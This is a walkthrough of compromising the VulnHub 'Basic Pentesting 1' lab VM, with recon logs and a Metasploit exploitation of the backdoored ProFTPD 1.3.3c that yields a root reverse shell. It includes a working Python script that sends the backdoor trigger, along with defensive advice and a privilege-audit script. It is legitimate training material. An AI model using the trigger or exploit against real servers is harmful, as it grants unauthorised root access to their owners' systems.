Basic Pentesting 1

In this walkthrough we’ll look at how to compromise the simple VulnHub image ‘Basic Pentesting 1’, released by Josiah Pierce.  The aim is to get root privileges on the machine.

Details about the image and how to download it can all be found on the vulnhub website – https://www.vulnhub.com/entry/basic-pentesting-1,216/


Once the image has been downloaded and booted, its console immediately gives away an OS type, a version and a username.  We can note these down for use later on.

Basic Pentesting 1 - 1

To start our reconnaissance we need to find the IP address of the target;

Basic Pentesting 1 - 2

Basic Pentesting 1 - 3

This identifies 192.168.86.128 as being the IP address we need.  Note this is based on local DHCP so you will likely have a different target IP Address and MAC Address.

Now we know what we’re aiming for, let’s perform some basic recon and see what services are running.

Basic Pentesting 1 - 4

Basic Pentesting 1 - 5

We can note down the various services and software types for reference later, but for now we can start with the web service on TCP 80 as these are often low-hanging fruit.

It looks like a very basic website and, looking at the source code, there is nothing obviously exploitable;

Basic Pentesting 1 - 6

Let’s see if there are any hidden paths by brute-forcing directory names with dirb and its common.txt wordlist;

Basic Pentesting 1 - 7

Success: dirb turns up a WordPress install under /secret/ (wp-admin, wp-content, wp-includes and xmlrpc.php are all there).  I tried to have a poke around the site but it was really slow to respond.  Unsure if this is a deliberate ‘feature’ or not, I left the page to ponder itself while I looked at other services on the machine.  Earlier on we found an FTP service, ProFTPD 1.3.3c; let’s see if there are any known vulnerabilities for it on Exploit-DB.

Basic Pentesting 1 - 9

Bingo!  Reviewing the exploits, they explain how this came about: in late 2010 the ProFTPD project’s main distribution server was compromised and the 1.3.3c source archive on it replaced with a copy carrying a backdoor.  It sat there for a few days before the project noticed, so anyone who downloaded and built 1.3.3c in that window got the backdoor, and that is what both Exploit-DB entries use.  A textbook software supply-chain attack, in other words: the legitimate release and the poisoned download differed only by the planted code.  In the interest of saving time, I thought I’d try and go for a quick win with Metasploit rather than reverse engineering the code to build my own exploit.

Fire up msfconsole and identify the exploit module;

Basic Pentesting 1 - 10

Then configure the module; in this case that means setting just RHOST, the target’s IP address, since the only other option, RPORT, already defaults to 21.

Basic Pentesting 1 - 11

The exploit succeeds and the shell it hands us is already root: the id at the end of the transcript shows uid=0(root).  No privilege escalation needed, so that’s it, game over.
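To answer the ‘could you have written this yourself’ question, here is an added example (my own code, not from the walkthrough, the VulnHub image or the Metasploit project) of what the module actually sends. The backdoor planted in the 1.3.3c archive sits in the HELP command handler: a HELP ACIDBITCHEZ request makes the server call setuid(0); setgid(0); system("/bin/sh;/bin/bash"), so the ‘exploit’ is nothing more than that one line followed by whatever you want the shell to run. Assumptions: the target host and port constants are the walkthrough’s lab address; the FakeBackdooredProftpd class is a constructed stand-in so the script runs offline (it mimics only the banner, the trigger and two shell commands); and run_backdoor_command assumes the shell’s output comes back on the FTP control connection, which is why it brackets the command in echoed markers. Metasploit does not rely on that assumption: the payload in the transcript opens a separate reverse connection (the ‘reverse TCP double handler’).

```python
import os
import re
import socket

# Lab target from the walkthrough; change for your own environment.
TARGET_HOST = "192.168.86.128"
TARGET_PORT = 21

# The string hidden in the backdoored 1.3.3c help.c: a HELP command with this
# argument makes the server run setuid(0); setgid(0); system("/bin/sh;/bin/bash").
BACKDOOR_TRIGGER = b"HELP ACIDBITCHEZ\r\n"

# ProFTPD greets with e.g. "220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) [...]"
BANNER_RE = re.compile(rb"^220.*ProFTPD (\S+) Server", re.M)


def banner_version(banner: bytes):
    """Return the ProFTPD version advertised in the 220 greeting, or None."""
    m = BANNER_RE.search(banner)
    return m.group(1).decode() if m else None


def read_until(sock, marker: bytes, limit: int = 1 << 16) -> bytes:
    """Read from anything with recv() until marker appears, EOF, or limit bytes."""
    buf = b""
    while marker not in buf and len(buf) < limit:
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def run_backdoor_command(sock, command: str, token: str = "") -> bytes:
    """What the Metasploit module boils down to: read the greeting, send the
    HELP trigger, then feed one command line to the shell the backdoor spawned.

    Assumption (not verified against the real daemon): the shell's stdout is the
    FTP control socket, so the command is bracketed with echoed markers to cut
    its output out of the stream.  Metasploit avoids this by sending a command
    that connects back to its handler instead.
    """
    greeting = read_until(sock, b"\r\n")
    if banner_version(greeting) != "1.3.3c":
        raise RuntimeError(f"refusing to send trigger, banner is {greeting!r}")
    token = token or os.urandom(8).hex()
    start, end = f"{token}-start", f"{token}-end"
    sock.sendall(BACKDOOR_TRIGGER)
    sock.sendall(f"echo {start}\n{command}\necho {end}\n".encode())
    raw = read_until(sock, end.encode())
    head = raw.index(start.encode()) + len(start) + 1   # +1 skips echo's newline
    tail = raw.index(end.encode())
    return raw[head:tail]


class FakeBackdooredProftpd:
    """Constructed stand-in for a backdoored server so the example runs offline.
    It speaks just enough FTP to greet, flips into 'shell mode' on the trigger,
    and then answers `echo` and `id` the way the root shell on the VM did."""

    def __init__(self):
        self._out = (b"220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) "
                     b"[192.168.86.128]\r\n")
        self._shell = False

    def recv(self, n: int) -> bytes:
        data, self._out = self._out[:n], self._out[n:]
        return data

    def sendall(self, data: bytes) -> None:
        if not self._shell:
            if data == BACKDOOR_TRIGGER:
                self._shell = True        # setuid(0); system("/bin/sh") happened
            else:
                self._out += b"500 " + data.strip() + b" not understood\r\n"
            return
        for line in data.decode().splitlines():
            if line.startswith("echo "):
                self._out += line[5:].encode() + b"\n"
            elif line == "id":
                self._out += b"uid=0(root) gid=0(root) groups=0(root),65534(nogroup)\n"


if __name__ == "__main__":
    # Offline rehearsal against the fake, then the same code path against the lab box.
    print(run_backdoor_command(FakeBackdooredProftpd(), "id").decode(), end="")
    with socket.create_connection((TARGET_HOST, TARGET_PORT), timeout=10) as s:
        print(run_backdoor_command(s, "id").decode(), end="")
```

The banner gate refuses to send the trigger to anything that does not announce 1.3.3c, but note its limit: a clean 1.3.3c and a poisoned one advertise the same version, so the banner is only a gate, not a detection. Only the trigger, or a hash of the source archive, tells the two apart.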


 

What are the morals of the story here for security-conscious admins?

  • Only run services you really need.  If you don’t need it, turn it off to reduce the potential attack surface.
  • Keep your software up to date and review release notes and security resources such as CVE and Exploit-DB for vulnerabilities.  This version of ProFTPD was several years old when the image was built, so there is no excuse for not having spotted the issue.  The version number alone would not have told you whether your copy was the poisoned one, though; only checking the downloaded archive against the hashes or signatures the project publishes does that, so verify source archives before you build them.
  • Only run services with suitably privileged accounts.  An FTP daemon does not need root for its day-to-day work, and ProFTPD has User and Group directives for exactly that purpose.  One caveat: a daemon started as root so that it can bind port 21 usually only changes its effective uid and keeps root as the real and saved uid so it can switch to whichever account logs in, and the backdoor’s setuid(0) call simply takes that back.  The 65534(nogroup) supplementary group in the id output at the end of the transcript is consistent with exactly that: the daemon had dropped its group, the backdoor restored uid and gid 0.  A service with no root identity left to fall back on (and no CAP_SETUID) would have turned this from ‘game over’ into a foothold that still needed a privilege escalation.
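As an added example for the ‘suitably privileged account’ point (my own code, not from the walkthrough or from ProFTPD), here is a small audit that goes beyond the FTP case: for every process on a Linux host it reports whether the process runs as root, has only dropped its effective uid (and so can take root back with setuid(0), which is exactly what the backdoor did), or is genuinely unprivileged. It reads the Uid and Gid lines of /proc/<pid>/status, whose four columns are the real, effective, saved and filesystem ids. The three status bodies in SAMPLE_STATUS are constructed for the example, with made-up pids and names; the proftpd one is what a root-started daemon that has relinquished only its effective ids to 65534 looks like.

```python
import os
from typing import Dict, List, Tuple

ID_FIELDS = ("real", "effective", "saved", "fs")

# Constructed /proc/<pid>/status fragments (pids and names are made up).  The
# proftpd one shows a daemon started as root that has only switched its
# effective ids to 65534: real and saved uid are still 0, so setuid(0) succeeds.
SAMPLE_STATUS = {
    1234: "Name:\tproftpd\nUid:\t0\t65534\t0\t65534\nGid:\t0\t65534\t0\t65534\n",
    1235: "Name:\tnginx\nUid:\t33\t33\t33\t33\nGid:\t33\t33\t33\t33\n",
    1236: "Name:\tsshd\nUid:\t0\t0\t0\t0\nGid:\t0\t0\t0\t0\n",
}

# Ordered worst first; audit() sorts its report by this order.
VERDICTS = ("running as root", "euid dropped, can regain root", "unprivileged")


def parse_status(text: str) -> dict:
    """Extract Name, Uid and Gid from a /proc/<pid>/status body."""
    fields = {}
    for line in text.splitlines():
        key, _, value = line.partition(":")
        fields[key.strip()] = value.strip()

    def ids(value: str) -> dict:
        return dict(zip(ID_FIELDS, (int(x) for x in value.split())))

    return {"name": fields["Name"], "uid": ids(fields["Uid"]), "gid": ids(fields["Gid"])}


def classify(uid: dict) -> str:
    """How far has the process really dropped root?

    setuid(0) needs no capability when 0 is the real or saved uid, so a daemon
    that only changed its effective uid is one call away from root, which is
    what the ProFTPD backdoor relied on."""
    if uid["effective"] == 0:
        return VERDICTS[0]
    if uid["real"] == 0 or uid["saved"] == 0:
        return VERDICTS[1]
    return VERDICTS[2]


def audit(statuses: Dict[int, str]) -> List[Tuple[int, str, str]]:
    """Return (pid, name, verdict) for each status body, worst cases first."""
    rows = []
    for pid, text in statuses.items():
        info = parse_status(text)
        rows.append((pid, info["name"], classify(info["uid"])))
    rows.sort(key=lambda r: (VERDICTS.index(r[2]), r[0]))
    return rows


def read_proc(proc: str = "/proc") -> Dict[int, str]:
    """Collect the status body of every live process (Linux only)."""
    statuses = {}
    for entry in os.listdir(proc):
        if entry.isdigit():
            try:
                with open(os.path.join(proc, entry, "status")) as f:
                    statuses[int(entry)] = f.read()
            except OSError:      # the process exited between listdir and open
                pass
    return statuses


if __name__ == "__main__":
    source = read_proc() if os.path.isdir("/proc") else SAMPLE_STATUS
    for pid, name, verdict in audit(source):
        print(f"{pid:>7}  {name:<20} {verdict}")
```

Run it as root on the target after a compromise, or on your own servers before one, and anything in the middle category is a service that looks unprivileged in ps but is not: fix it by starting the service without root in the first place (a non-root account plus a systemd AmbientCapabilities=CAP_NET_BIND_SERVICE for the low port) rather than by relying on a seteuid drop.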

 

And what are the morals of the story for the penetration tester?

  • Be thorough in your enumeration and note down what you see.
  • Don’t get dragged down the rabbit hole early on; keep looking for low-hanging fruit before committing lots of time to something.
  • Use Metasploit by all means, but understand what is going on and why.  Could you have reverse engineered the module to create your own version of the exploit if needed?

 

Command-line I/O from this attack (edited for clarity);

root@kali:~# netdiscover -r 192.168.86.0/24

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP              At MAC Address       Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.86.1     00:50:56:c0:00:01      1      60  VMware, Inc.
 192.168.86.128   00:0c:29:ca:f6:ba      1      60  VMware, Inc.
 192.168.86.254   00:50:56:fc:1f:cf      1      60  VMware, Inc.

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.86.129  netmask 255.255.255.0  broadcast 192.168.86.255

**SNIP**




root@kali:~# nmap -n -v -Pn -p- -sV 192.168.86.128

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-07 13:44 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 13:44
Scanning 192.168.86.128 [1 port]
Completed ARP Ping Scan at 13:44, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:44
Scanning 192.168.86.128 [65535 ports]
Discovered open port 80/tcp on 192.168.86.128
Discovered open port 22/tcp on 192.168.86.128
Discovered open port 21/tcp on 192.168.86.128
Completed SYN Stealth Scan at 13:44, 5.72s elapsed (65535 total ports)
Initiating Service scan at 13:44
Scanning 3 services on 192.168.86.128
Completed Service scan at 13:45, 10.01s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.86.128.
Initiating NSE at 13:45
Completed NSE at 13:45, 0.02s elapsed
Initiating NSE at 13:45
Completed NSE at 13:45, 0.00s elapsed
Nmap scan report for 192.168.86.128
Host is up (0.0018s latency).
Not shown: 65532 closed ports

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

MAC Address: 00:0C:29:CA:F6:BA (VMware)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

root@kali:~# dirb http://192.168.86.128
-----------------
DIRB v2.22 
By The Dark Raver
-----------------
START_TIME: Wed Feb 7 13:48:39 2018
URL_BASE: http://192.168.86.128/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612 
---- Scanning URL: http://192.168.86.128/ ----

+ http://192.168.86.128/index.html (CODE:200|SIZE:177) 
==> DIRECTORY: http://192.168.86.128/secret/ 
+ http://192.168.86.128/server-status (CODE:403|SIZE:302) 
---- Entering directory: http://192.168.86.128/secret/ ----
+ http://192.168.86.128/secret/index.php (CODE:301|SIZE:0) 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-content/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-includes/ 
+ http://192.168.86.128/secret/xmlrpc.php (CODE:405|SIZE:42) 
---- Entering directory: http://192.168.86.128/secret/wp-admin/ ----
+ http://192.168.86.128/secret/wp-admin/admin.php (CODE:302|SIZE:0) 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/css/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/images/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/includes/ 
+ http://192.168.86.128/secret/wp-admin/index.php (CODE:302|SIZE:0) 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/js/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/maint/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/network/ 
==> DIRECTORY: http://192.168.86.128/secret/wp-admin/user/

**SNIP**

root@kali:~# searchsploit proftpd 1.3.3c

ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)

root@kali:~# msfconsole

msf > search proftpd

Matching Modules
================

   Name                                          Disclosure Date  Rank       Description
   ----                                          ---------------  ----       -----------
   exploit/freebsd/ftp/proftp_telnet_iac         2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace             2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac           2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent   2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   exploit/unix/ftp/proftpd_133c_backdoor        2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec         2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution


msf > use exploit/unix/ftp/proftpd_133c_backdoor

msf exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.86.128
rhost => 192.168.86.128
msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit

[*] Started reverse TCP double handler on 192.168.86.129:4444
[*] 192.168.86.128:21 - Sending Backdoor Command
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo uGd9Cl4X4B1LGV5c;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "uGd9Cl4X4B1LGV5c\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.86.129:4444 -> 192.168.86.128:57980) at 2018-02-07 13:59:56 +0000

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
